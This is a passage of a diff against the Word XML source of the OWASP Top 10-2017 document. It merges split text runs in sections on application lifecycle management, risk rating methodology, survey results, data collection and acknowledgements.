-        <w:t>ion activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise. Learn from mistakes and offer positive incentives to promote improvements</w:t>
+        <w:t>Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise. Learn from mistakes and offer positive incentives to promote improvements</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13106,10 +12245,7 @@
       <w:bookmarkStart w:id="130" w:name="manage-the-full-application-lifecycle"/>
       <w:bookmarkEnd w:id="130"/>
       <w:r>
-        <w:t>Manage t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>he full Application Lifecycle</w:t>
+        <w:t>Manage the full Application Lifecycle</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13117,13 +12253,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Applications belong to the most complex systems humans regularly create and maintain. IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an application. W</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e suggest establishing the role of application managers as technical counterpart to the application owner. The application manager is in charge of the whole application lifecycle from IT perspective from collecting the requirements until the process of ret</w:t>
-      </w:r>
-      <w:r>
-        <w:t>iring systems, which is often overlooked.</w:t>
+        <w:t>Applications belong to the most complex systems humans regularly create and maintain. IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an application. We suggest establishing the role of application managers as technical counterpart to the application owner. The application manager is in charge of the whole application lifecycle from IT perspective from collecting the requirements until the process of retiring systems, which is often overlooked.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13157,10 +12287,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Compil</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e the technical requirements including functional and non functional security requirements.</w:t>
+        <w:t>Compile the technical requirements including functional and non functional security requirements.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13182,10 +12309,7 @@
       <w:bookmarkStart w:id="132" w:name="request-for-proposals-rfp-and-contractin"/>
       <w:bookmarkEnd w:id="132"/>
       <w:r>
-        <w:t>Request for Proposals (RFP) and Contra</w:t>
-      </w:r>
-      <w:r>
-        <w:t>cting</w:t>
+        <w:t>Request for Proposals (RFP) and Contracting</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13253,10 +12377,7 @@
         <w:t>Note</w:t>
       </w:r>
       <w:r>
-        <w:t>: The Annex is a sample specific to US contract law, and is likely to need legal review in your jurisdiction. Please consult qualified legal advice befo</w:t>
-      </w:r>
-      <w:r>
-        <w:t>re using the Annex</w:t>
+        <w:t>: The Annex is a sample specific to US contract law, and is likely to need legal review in your jurisdiction. Please consult qualified legal advice before using the Annex</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13290,10 +12411,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Define the security architecture, controls, and countermeasures appropriate to the protection needs and the expec</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ted threat level. This should be supported by security specialists.</w:t>
+        <w:t>Define the security architecture, controls, and countermeasures appropriate to the protection needs and the expected threat level. This should be supported by security specialists.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13317,10 +12435,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>In each sprint, ensure security stories are created including constraints added for non-function</w:t>
-      </w:r>
-      <w:r>
-        <w:t>al requirements.</w:t>
+        <w:t>In each sprint, ensure security stories are created including constraints added for non-functional requirements.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13354,10 +12469,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Test the technical functions and integration with the IT architecture and coordi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>nate business tests.</w:t>
+        <w:t>Test the technical functions and integration with the IT architecture and coordinate business tests.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13393,10 +12505,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Put the application in ope</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ration and migrate from previously used applications if needed.</w:t>
+        <w:t>Put the application in operation and migrate from previously used applications if needed.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13443,10 +12552,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Raise t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>he security awareness of users and manage conflicts about usability vs security.</w:t>
+        <w:t>Raise the security awareness of users and manage conflicts about usability vs security.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13470,10 +12576,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Update all documentation, including in CMDB and</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> the security architecture, controls, and countermeasures, including any runbooks or project documentation.</w:t>
+        <w:t>Update all documentation, including in CMDB and the security architecture, controls, and countermeasures, including any runbooks or project documentation.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13550,10 +12653,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The Risk Rating methodology for the Top 1</w:t>
-      </w:r>
-      <w:r>
-        <w:t>0 is based on the</w:t>
+        <w:t>The Risk Rating methodology for the Top 10 is based on the</w:t>
       </w:r>
       <w:hyperlink r:id="rId224">
         <w:r>
@@ -13564,13 +12664,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>. For each Top 10 category, we estimated the typical risk that each weakness introduces to a typical web application by looking a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t common likelihood factors and impact factors for each common weakness. We then ordered the Top 10 according to those weaknesses that typically introduce the most significant risk to an application. These factors get updated with each new Top 10 release a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s things change and evolve.</w:t>
+        <w:t>. For each Top 10 category, we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood factors and impact factors for each common weakness. We then ordered the Top 10 according to those weaknesses that typically introduce the most significant risk to an application. These factors get updated with each new Top 10 release as things change and evolve.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13589,13 +12683,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> defines numerous factors to help calculate the risk of an identified vulnerability. However, the Top 10 must talk</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> about generalities, rather than specific vulnerabilities in real applications and APIs. Consequently, we can never be as precise as system owners can be when calculating risks for their application(s). You are best equipped to judge the importance of your</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> applications and data, what your threats are, and how your system has been built and is being operated.</w:t>
+        <w:t xml:space="preserve"> defines numerous factors to help calculate the risk of an identified vulnerability. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications and APIs. Consequently, we can never be as precise as system owners can be when calculating risks for their application(s). You are best equipped to judge the importance of your applications and data, what your threats are, and how your system has been built and is being operated.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13603,19 +12691,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>Our methodology includes three likelihood factors for each weakness (prevalence, detectability, and ease of exploit) and one impact factor (technical i</w:t>
-      </w:r>
-      <w:r>
-        <w:t>mpact). The risk scales for each factor range from 1-Low to 3-High with terminology specific for each factor. The prevalence of a weakness is a factor that you typically don't have to calculate. For prevalence data, we have been supplied prevalence statist</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ics from a number of different organizations (as referenced in the Acknowledgements on page 25) and we have aggregated their data together to come up with a Top 10 likelihood of existence list by prevalence. This data was then combined with the other two l</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ikelihood factors (detectability and ease of exploit) to calculate a likelihood rating for each weakness. The likelihood rating was then multiplied by our estimated average technical impact for each item to come up with an overall risk ranking for each ite</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m in the Top 10 (the higher the result the higher the risk). Detectability, Ease of Exploit, and Impact were calculated from analyzing reported CVEs that were associated with each of the Top 10 categories.</w:t>
+        <w:t>Our methodology includes three likelihood factors for each weakness (prevalence, detectability, and ease of exploit) and one impact factor (technical impact). The risk scales for each factor range from 1-Low to 3-High with terminology specific for each factor. The prevalence of a weakness is a factor that you typically don't have to calculate. For prevalence data, we have been supplied prevalence statistics from a number of different organizations (as referenced in the Acknowledgements on page 25) and we have aggregated their data together to come up with a Top 10 likelihood of existence list by prevalence. This data was then combined with the other two likelihood factors (detectability and ease of exploit) to calculate a likelihood rating for each weakness. The likelihood rating was then multiplied by our estimated average technical impact for each item to come up with an overall risk ranking for each item in the Top 10 (the higher the result the higher the risk). Detectability, Ease of Exploit, and Impact were calculated from analyzing reported CVEs that were associated with each of the Top 10 categories.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13629,16 +12705,7 @@
         <w:t>Note</w:t>
       </w:r>
       <w:r>
-        <w:t>: This approach does not take the likelihood o</w:t>
-      </w:r>
-      <w:r>
-        <w:t>f the threat agent into account. Nor does it account for any of the various technical details associated with your particular application. Any of these factors could significantly affect the overall likelihood of an attacker finding and exploiting a partic</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ular vulnerability. This rating does not take into account the actual impact on your business. Your organization will have to decide how much security risk from applications and APIs the organization is willing to accept given your culture, industry, and r</w:t>
-      </w:r>
-      <w:r>
-        <w:t>egulatory environment. The purpose of the OWASP Top 10 is not to do this risk analysis for you.</w:t>
+        <w:t>: This approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various technical details associated with your particular application. Any of these factors could significantly affect the overall likelihood of an attacker finding and exploiting a particular vulnerability. This rating does not take into account the actual impact on your business. Your organization will have to decide how much security risk from applications and APIs the organization is willing to accept given your culture, industry, and regulatory environment. The purpose of the OWASP Top 10 is not to do this risk analysis for you.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13735,16 +12802,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The foll</w:t>
-      </w:r>
-      <w:r>
-        <w:t>owing table presents a summary of the 2017 Top 10 Application Security Risks, and the risk factors we have assigned to each risk. These factors were determined based on the available statistics and the experience of the OWASP Top 10 team. To understand the</w:t>
-      </w:r>
-      <w:r>
-        <w:t>se risks for a particular application or organization, you must consider your own specific threat agents and business impacts. Even severe software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessa</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ry attack or the business impact is negligible for the assets involved.</w:t>
+        <w:t>The following table presents a summary of the 2017 Top 10 Application Security Risks, and the risk factors we have assigned to each risk. These factors were determined based on the available statistics and the experience of the OWASP Top 10 team. To understand these risks for a particular application or organization, you must consider your own specific threat agents and business impacts. Even severe software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13813,10 +12871,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The Top 10 covers a lot of ground, but there are many other risks you should consider and evaluate in your organization. Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being ide</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ntified all the time. Other important application security risks (ordered by CWE-ID) that you should additionally consider include:</w:t>
+        <w:t>The Top 10 covers a lot of ground, but there are many other risks you should consider and evaluate in your organization. Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being identified all the time. Other important application security risks (ordered by CWE-ID) that you should additionally consider include:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13900,13 +12955,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>CWE-601: Unvalidated Forwar</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>d and Redirects</w:t>
+          <w:t>CWE-601: Unvalidated Forward and Redirects</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -13940,13 +12989,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>CWE-829: Inclusion of Functionality f</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>rom Untrusted Control Sphere (3rd Party Content)</w:t>
+          <w:t>CWE-829: Inclusion of Functionality from Untrusted Control Sphere (3rd Party Content)</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -14007,10 +13050,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>For the survey, we collected the vulnerability categories that had been previously identified as being “on the cusp” or were mentioned in feedback to 2017 RC1 on the Top 10 mailing list. We put them into a ranked survey and asked res</w:t>
-      </w:r>
-      <w:r>
-        <w:t>pondents to rank the top four vulnerabilities that they felt should be included in the OWASP Top 10-2017. The survey was open from Aug 2 – Sep 18, 2017. 516 responses were collected and the vulnerabilities were ranked.</w:t>
+        <w:t>For the survey, we collected the vulnerability categories that had been previously identified as being “on the cusp” or were mentioned in feedback to 2017 RC1 on the Top 10 mailing list. We put them into a ranked survey and asked respondents to rank the top four vulnerabilities that they felt should be included in the OWASP Top 10-2017. The survey was open from Aug 2 – Sep 18, 2017. 516 responses were collected and the vulnerabilities were ranked.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -14287,10 +13327,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Exposure of private information is clearly the highest-ranking vulnerability, but fits very easily as an </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">additional emphasis into the existing </w:t>
+        <w:t xml:space="preserve">Exposure of private information is clearly the highest-ranking vulnerability, but fits very easily as an additional emphasis into the existing </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14308,10 +13345,7 @@
         <w:t>A8:2017-Insecure Deserialization</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">after risk rating. The fourth ranked User Controlled Key is included in </w:t>
+        <w:t xml:space="preserve"> after risk rating. The fourth ranked User Controlled Key is included in </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14320,10 +13354,7 @@
         <w:t>A5:2017-Broken Access Control</w:t>
       </w:r>
       <w:r>
-        <w:t>; it is good to see it rank highly on the survey, as there is not much data relating to authorization vulnerabilities. The number five ranked category in t</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">he survey is Insufficient Logging and Monitoring, which we believe is a good fit for the Top 10 list, which is why it has become </w:t>
+        <w:t xml:space="preserve">; it is good to see it rank highly on the survey, as there is not much data relating to authorization vulnerabilities. The number five ranked category in the survey is Insufficient Logging and Monitoring, which we believe is a good fit for the Top 10 list, which is why it has become </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14332,10 +13363,7 @@
         <w:t>A10:2017-Insufficient Logging &amp; Monitoring</w:t>
       </w:r>
       <w:r>
-        <w:t>. We have moved to a point where applications need to be able to define what may be a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n attack and generate appropriate logging, alerting, escalation and response. </w:t>
+        <w:t>. We have moved to a point where applications need to be able to define what may be an attack and generate appropriate logging, alerting, escalation and response. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14353,10 +13381,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Traditionally, the data collected and analyzed was more along the lines of frequency data; how many vulnerabilities found in tested applications. As is well kno</w:t>
-      </w:r>
-      <w:r>
-        <w:t>wn, tools traditionally report all instances found of a vulnerability and humans traditionally report a single finding with a number of examples. This makes it very difficult to aggregate the two styles of reporting in a comparable manner.</w:t>
+        <w:t>Traditionally, the data collected and analyzed was more along the lines of frequency data; how many vulnerabilities found in tested applications. As is well known, tools traditionally report all instances found of a vulnerability and humans traditionally report a single finding with a number of examples. This makes it very difficult to aggregate the two styles of reporting in a comparable manner.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14364,16 +13389,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>For 2017, the in</w:t>
-      </w:r>
-      <w:r>
-        <w:t>cidence rate was calculated by how many applications in a given data set had one or more of a specific vulnerability type. The data from many larger contributors was provided in two views: The first was the traditional frequency style of counting every ins</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">tance found of a vulnerability, the second was the count of applications that each vulnerability was found in (one or more times). While not perfect, this reasonably allows us to compare the data from Human Assisted Tools and Tool Assisted Humans. The raw </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">data and </w:t>
+        <w:t xml:space="preserve">For 2017, the incidence rate was calculated by how many applications in a given data set had one or more of a specific vulnerability type. The data from many larger contributors was provided in two views: The first was the traditional frequency style of counting every instance found of a vulnerability, the second was the count of applications that each vulnerability was found in (one or more times). While not perfect, this reasonably allows us to compare the data from Human Assisted Tools and Tool Assisted Humans. The raw data and </w:t>
       </w:r>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -14396,19 +13412,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">We received 40+ submissions in the call for </w:t>
-      </w:r>
-      <w:r>
-        <w:t>data, as many were from the original data call that was focused on frequency, we were able to use data from 23 contributors covering ~114,000 applications. We used a one year block of time where possible and identified by the contributor. The majority of a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>pplications are unique, though we acknowledge the likelihood of some repeat applications between the yearly data from Veracode. The 23 datasets used were either identified as tool assisted human testing or specifically provided incidence rate from human as</w:t>
-      </w:r>
-      <w:r>
-        <w:t>sisted tools. Anomalies in the selected data of 100%+ incidence were adjusted down to 100% max. To calculate the incidence rate, we calculated the percentage of the total applications there were found to contain each vulnerability type. The ranking of inci</w:t>
-      </w:r>
-      <w:r>
-        <w:t>dence was used for the prevalence calculation in the overall risk for ranking the Top 10.</w:t>
+        <w:t>We received 40+ submissions in the call for data, as many were from the original data call that was focused on frequency, we were able to use data from 23 contributors covering ~114,000 applications. We used a one year block of time where possible and identified by the contributor. The majority of applications are unique, though we acknowledge the likelihood of some repeat applications between the yearly data from Veracode. The 23 datasets used were either identified as tool assisted human testing or specifically provided incidence rate from human assisted tools. Anomalies in the selected data of 100%+ incidence were adjusted down to 100% max. To calculate the incidence rate, we calculated the percentage of the total applications there were found to contain each vulnerability type. The ranking of incidence was used for the prevalence calculation in the overall risk for ranking the Top 10.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14993,10 +13997,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>We’d like to thank the individual contributors who spent many hours collectively contributing to the Top 1</w:t>
-      </w:r>
-      <w:r>
-        <w:t>0 in GitHub.</w:t>
+        <w:t>We’d like to thank the individual contributors who spent many hours collectively contributing to the Top 10 in GitHub.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15854,10 +14855,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>We would be</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> remiss not to mention that Dirk Wetter, Jim Manico, and Osama Elnaggar have provided extensive assistance. Also, Chris Frohoff and Gabriel Lawrence provided invaluable support in the writing of the new A8:2017-Insecure Deserialization risk.</w:t>
+        <w:t>We would be remiss not to mention that Dirk Wetter, Jim Manico, and Osama Elnaggar have provided extensive assistance. Also, Chris Frohoff and Gabriel Lawrence provided invaluable support in the writing of the new A8:2017-Insecure Deserialization risk.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -18249,7 +17247,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{34119249-2DE1-46D7-8AE3-A0902963E103}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B4EE8607-71B9-4F13-8B01-8AE7523A4957}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
